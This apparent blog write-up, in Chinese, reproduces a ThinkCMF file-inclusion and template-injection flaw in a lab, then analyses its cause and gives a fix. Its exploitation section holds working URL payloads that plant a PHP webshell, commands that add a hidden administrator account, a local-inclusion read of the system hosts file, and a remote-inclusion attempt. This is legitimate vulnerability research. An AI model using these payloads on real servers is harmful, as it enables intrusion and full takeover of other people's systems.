漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现

最新推荐文章于 2024-06-20 09:38:07 发布
最新推荐文章于 2024-06-20 09:38:07 发布
阅读量2.8k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: 漏洞复现 ThinkCMF 文件包含 远程代码执行 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwl012345/article/details/102792586
版权

0x00 简介

ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。

0x01 漏洞介绍

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

0x02 影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

0x03 环境搭建

本次使用的环境版本是ThinkCMF2.2.3版本,直接下载相关压缩包,解压之后放到phpstudy下面,然后访问该目录,按照ThinkCMF的安装向导进行安装。

1.下载ThinkCMF2.2.3版本
下载地址: https://github.com/thinkcmf/cmfx
在这里插入图片描述

2.解压放到phpstudy的www目录下
在这里插入图片描述

3.在浏览器中访问ThinkCMF
http://IP地址/文件夹名称
在这里插入图片描述

4.进行安装
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
安装完成。
到这里漏洞环境就搭建好了,接下来就可以进行漏洞测试了。

0x04 漏洞利用

  • 第一种方法:使用a参数的fetch方法,将想查看的内容写入到一个文件中,然后执行该文件,就可以查看到内容了。

(1):查看phpinfo()信息
构造payload:
?a=fetch&templateFile=public/index&prefix=’’&content=<php>file_put_contents(‘test.php’,’<?php phpinfo(); >’)</php>
在这里插入图片描述
执行之后页面是空白的,然后执行该文件。
在这里插入图片描述
执行之后查看到了php的相关的信息。

(2):上传一句话木马
构造payload:
?a=fetch&templateFile=public/index&prefix=’’&content=<php>file_put_contents(‘test1.php’,’<?php @eval($_POST[cmd]) >’)</php>
在这里插入图片描述
页面为空白,然后执行该文件
在这里插入图片描述
使用菜刀进行连接。
在这里插入图片描述
使用菜刀成功连接。

(3):使用菜刀虚拟终端新建用户打开远程桌面
新建用户并添加到管理员组
net user wwl 123 /add
net localgroup administrators wwl /add
在这里插入图片描述
在kali上执行以下命令
rdesktop -uwwl -p123 192.168.223.128
-u后面跟用户名
-p后面跟密码
在这里插入图片描述
这样就通过kali打开了目标主机的远程桌面。

  • 第二种方法:通过构造a参数的display方法,实现任意文件包含

(1):本地文件包含
构造payload
?a=display&templateFile=README.md
在这里插入图片描述
构造payload
?a=display&templateFile=Nginx.conf
在这里插入图片描述
构造payload
?a=display&templateFile=C:\WINDOWS\system32\drivers\etc\hosts
在这里插入图片描述

(2):远程文件包含
构造payload
?a=display&templateFile=http://192.168.223.160/1.txt
在这里插入图片描述
无法进行远程文件包含。

0x05 漏洞分析

进行代码审计
由于ThinkCMF是开源项目,下载相关的源码进行审计

(1):查看主页代码
在这里插入图片描述
发现了项目路径,去application里面查看。

(2):在application里面发现了IndexController.class.php
在这里插入图片描述
发现存在display,主页内容太少,查看其父类。

(3):查看父类HomebaseController.class.php
在这里插入图片描述
在这里插入图片描述
发现display和fetch是public,可以被任意引用。

拓展
public的访问权限是最松的,它可以在同一个包内访问,也可以在不同包内访问,它表示紧随其后的元素对任何人都是可用的
private字面的意思是私有,可见它的访问权限是比较严格的,它表示除类型创建者和类型的内部方法之外的任何人都不能访问的元素。它就像一堵墙,当有人试图访问它时,就会在编译时得到错误信息
protected字面的意思是受保护的,它与private关键字的作用相当,差别仅在于继承的类可以访问protected成员,但是不能访问private成员

0x06 漏洞成因

引起漏洞最主要的问题就是因为fetch函数和display函数是public类型

fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。
fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。

0x07 修复方案

可以通过漏洞成因看出来,引起漏洞最主要的原因就是fetch和display函数是public,可以在外面被访问,因此修复方案就是将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected,使他们无法在外面被访问。

想走安全的小白
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【组件攻击链】ThinkCMF 高危漏洞分析与利用
systemino的博客
11-27 999
一、组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 普通的CMS(内容管理系统)一般不能完成所有的需求,而因为CMS在ThinkCMF内部
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1649
【thinkcmf-文件包含】public函数
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2172
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
CVE-2019-0708:无授权远程代码执行漏洞的智能防御工具
最新发布
gitblog_00042的博客
06-20 412
CVE-2019-0708:无授权远程代码执行漏洞的智能防御工具 项目地址:https://gitcode.com/Leoid/CVE-2019-0708 在网络安全领域,预防总是胜于治疗。这就是为什么 CVE-2019-0708 这个著名的漏洞如此重要的原因。它是一个针对Remote Desktop Services(以前称为Terminal Services)的远程代码执行漏洞,允许未经身份验...
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 301
?>’)/shell.php?>’)
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1139
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1435
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
实战 | 记一次对微信引流网站的简单渗透测试
2201_75362610的博客
06-27 127
没啥技术可言,纯粹发上来记录一下,不然就真的尘封了。
安装 ThinkCMF
相逢不晚的博客
07-12 1042
一、下载 ThinkCMF 1.composer 下载 正式版: composer create-project thinkcmf/thinkcmf:5.1.* thinkcmf5_1 开发版: composer create-project thinkcmf/thinkcmf:5.1.*-dev thinkcmf51_dev 2.官网下载 点击前往官网下载。 二、安装 下载完成后,在 PHPStudy 中配置站点,站点目录为public目录。 打开浏览器,访问刚刚创建的站点,开始安装。 第一步,会
ThinkCMF框架任意内容包含漏洞分析复现
m0_48520508的博客
07-29 586
0x01简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 0x02漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1215
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
PHP代码审计——任意文件写入漏洞(LvyeCms)
W小哥
08-19 2651
一、代码审计 在add()方法,首先判断通过POST传递
详解文件包含漏洞及其解决方法
2301_77004573的博客
04-29 1850
文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。注:(包含:程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写)例如我们在写c语言编程时的include就是个包含的应用。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值